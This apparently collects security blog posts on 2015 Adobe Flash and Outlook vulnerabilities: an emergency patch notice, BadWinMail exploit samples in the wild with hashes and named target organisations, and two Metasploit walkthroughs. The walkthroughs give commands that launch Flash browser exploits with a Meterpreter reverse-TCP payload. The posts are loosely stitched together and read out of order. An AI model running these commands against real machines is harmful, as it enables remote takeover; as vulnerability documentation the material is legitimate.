Emergency Patch APSB16-01 For Flash Player 0day CVE-2015-8651

Adobe has release, the December 28th 2015, an emergency patch for Adobe Flash Player dealing with 19 vulnerabilities. This security bulletin has a Critical severity rating.

APSB16-01 is concerning:

  • Adobe Flash Player Desktop Runtime 20.0.0.235 and earlier for Windows and Macintosh
  • Adobe Flash Player Extended Support Release 18.0.0.268 and earlier for Windows and Macintosh
  • Adobe Flash Player for Google Chrome 20.0.0.228 and earlier for Windows, Macintosh, Linux and ChromeOS
  • Adobe Flash Player for Microsoft Edge and Internet Explorer 11 20.0.0.228 and earlier for Windows 10
  • Adobe Flash Player for Internet Explorer 10 and 11 20.0.0.228 and earlier for Windows 8.0 and 8.1
  • Adobe Flash Player for Linux 11.2.202.554 and earlier for Linux
  • AIR Desktop Runtime 20.0.0.204 and earlier for Windows and Macintosh
  • AIR SDK 20.0.0.204 and earlier for Windows, Macintosh, Android and iOS
  • AIR SDK & Compiler 20.0.0.204 and earlier for Windows, Macintosh, Android and iOS
  • AIR for Android 20.0.0.204 and earlier for Android

In particular, a vulnerability with CVE-2015-8651 identifier, that has been discovered by Kai Wang and Hunter Gao of Huawei’s, is reporting exploited in the wild in limited targeted attacks. No details have been provided on this vulnerability, but surely it is time to patch otherwise why did Adobe release an emergency patch during Christmas period, a coordinated disclosure for limited targeted attacks would have been sufficient and could have wait beginning of January.

CVE-2015-6172 BadWinmail found exploited in the wild

Conclusion: It seem that AV vendors did a big mistake and blocked thousands of legit emails and by consequence also disclosed the content of certain of these emails on Internet, like DRP plan of banks…
All detected samples have now reduced they’re detection rate to only marginal anti-viruses. But clearly F-Secure and BitDefender were detecting and blocking thousands of emails during the last days. For the moment, we have no explanation from the anti-virus vendors.
I would like to thanks @_clem1, @Kafeine and @PhysicalDrive0 for they’re support in these clarifications.

On December 8th 2015, Microsoft released, during his regular Patch Tuesday, two updated security advisory, one new security advisory and twelve security bulletins. On the twelve security bulletins, MS15-131 concerned Microsoft Office and fixed 6 privately reported vulnerabilities.

One of the 6 vulnerabilities fixed in MS15-131, CVE-2015-6172 vulnerability raised particular attention of the security community. This vulnerability, named Outlook “letterbomb” or “BadWinMail“, would allow an attacker to sneak past Outlook’s security features. The vulnerability affects Office 2010 and later, as well as Microsoft Word 2007 with Service Pack 3.

This vulnerability has been discovered and privately reported to Microsoft by Haifei Li of Intel Security IPS Research Team. The security researcher published a paper describing the vulnerability accompanied by a demonstration video.

Unfortunately it seem that this vulnerability is actually exploited and was exploited before the release of Microsoft security patch.

Two files “FW Joseph J. Durczynski.rtf” (957a8d9d6bf7a0e54ad7eb350c930232) and “FW Philip Services Corp. et al..rtf” (20e184a415cd71eee1cea83df262f814) were submitted to VirusTotal the 27 December and detected as exploit of CVE-2015-6172.

FW Philip Services Corp. et al..rtf” file seems to be related to PSC Industrial Services. PSC claim to be the leading provider of specialty maintenance services and technology solutions to the critical energy infrastructure in the United States.

FW Joseph J. Durczynski.rtf” file seems to be related to Systech Environmental Corp and to particularly a certain Joe Durczynski working for Systech Environmental Corp.

By doing additional researches I found a third sample “_WRF_0CE7DC0E-AB99-4196-8DC2-F818ABF7C29A_.tmp” (52c4096e99126851736715c34b1f50a5) submitted on malwr the 23 December. This sample was also submitted on VirusTotal the 23 December and also recognised as exploit of CVE-2015-6172.

One additional file “FW RFQ.rtf” (fab9cfbc629fb3c3eb541fdaf8169ee1), reported to me by @PhysicalDrive0, targeting PGM Corp. PGM is a full service precision manufacturing corporation specialising in precision CNC machining, turning, grinding and assembly.

7328bf73af839bfc05e5cae177d60ca06cddc52beeee51fb2268f9a8b98d24fa

Interesting informations are the strings in the static analysis of the 23th December malwr sample.

Subject of the email was “FW: Disaster Recovery – home binder” and this email is an internal mail exchange of Safe Credit Union organisation. Also the mail containing the malware was sent the Tuesday, 8th September 2015.

It seem to be quiet urgent to patch if you didn’t already did it, but that seem to be more and more sure is that CVE-2015-6172 was used in the wild before the release of the Microsoft December patch.

Additional samples are actually submitted:

CVE-2014-0556 Adobe Flash Player copyPixelsToByteArray Method Integer Overflow

Timeline :

Vulnerability discovered by Chris Evans of Project Zero team at Google in 2014-07
Patched by the vendor via APSB14-21 the 2014–09-09
First public PoC provide by hdarwin on Packet Storm the 2014-09-30
Vulnerability reported integrated into exploit kits the 2014-10-20
Metasploit PoC provided the 2015-04-15

PoC provided by :

Chris Evans
Nicolas Joly
hdarwin
juan vazquez

Reference(s) :

CVE-2014-0556
APSB14-21

Affected version(s) :

Adobe Flash Player 14.0.0.179 and earlier versions

Tested on :

with Adobe Flash Player 14.0.0.176 (flashplayer14_0r0_176_winax.exe) and Internet Explorer 8 on Windows 7 SP1

Description :

This module exploits an integer overflow in Adobe Flash Player. The vulnerability occurs in the copyPixelsToByteArray method from the BitmapData object. The position field of the destination ByteArray can be used to cause an integer overflow and write contents out of the ByteArray buffer. This module has been tested successfully on: * Windows 7 SP1 (32-bit), IE 8 to IE 11 and Flash 14.0.0.176, 14.0.0.145, and 14.0.0.125. * Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 14.0.0.179. * Windows 8.1, Firefox 38.0.5 and Adobe Flash 14.0.0.179.

Commands :

use exploit/windows/browser/adobe_flash_copy_pixels_to_byte_array
set SRVHOST 192.168.6.138
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.6.138
run

getuid
sysinf

CVE-2014-0515 Adobe Flash Player Shader Buffer Overflow

Timeline :

Vulnerability discovered exploited in the wild in 2014-04-14 by Kaspersky Lab
Patched by the vendor via APSB14-13 the 2014–04-28
Windows Metasploit PoC provided the 2014-05-08
Vulnerability reported integrated into exploit kits the 2014-06-07
Multi platform Metasploit PoC provided the 2015-06-11

PoC provided by :

Unknown
juan vazquez

Reference(s) :

CVE-2014-0515
BID-67092
APSB14-13

Affected version(s) :

Adobe Flash Player 13.0.0.182 and earlier versions for Windows
Adobe Flash Player 13.0.0.201 and earlier versions for Macintosh
Adobe Flash Player 11.2.202.350 and earlier versions for Linux

Tested on :

with Adobe Flash Player 13.0.0.182 (flashplayer13_0r0_182_winax.exe) and Internet Explorer 8 on Windows 7 SP1

Description :

This module exploits a buffer overflow vulnerability in Adobe Flash Player. The vulnerability occurs in the flash.Display.Shader class, when setting specially crafted data as its bytecode, as exploited in the wild in April 2014. This module has been tested successfully on the following operating systems and Flash versions: Windows 7 SP1, IE 8 to IE 11 with Flash 13.0.0.182, Windows 7 SP1, Firefox 38.0.5, Flash 11.7.700.275 and Adobe Flash 13.0.0.182, Windows 8.1, Firefox 38.0.5 and Adobe Flash 13.0.0.182, Linux Mint “Rebecca” (32 bit), Firefox 33.0 and Adobe Flash 11.2.202.350

Commands :

use exploit/multi/browser/adobe_flash_pixel_bender_bof
set SRVHOST 192.168.6.138
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.6.138
run

getuid
sysinfo

Go to Top